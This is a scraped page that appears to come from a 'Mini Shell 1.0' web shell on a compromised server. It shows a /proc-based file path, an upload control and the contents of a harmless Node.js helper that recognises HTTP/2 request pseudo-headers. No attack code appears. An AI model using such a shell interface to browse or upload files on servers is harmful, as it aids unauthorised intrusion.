HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/share/nodejs/http2-wrapper/source/utils/
Upload File :
Current File : //proc/1784574/root/usr/share/nodejs/http2-wrapper/source/utils/is-request-pseudo-header.js
'use strict';

module.exports = header => {
	switch (header) {
		case ':method':
		case ':scheme':
		case ':authority':
		case ':path':
			return true;
		default:
			return false;
	}
};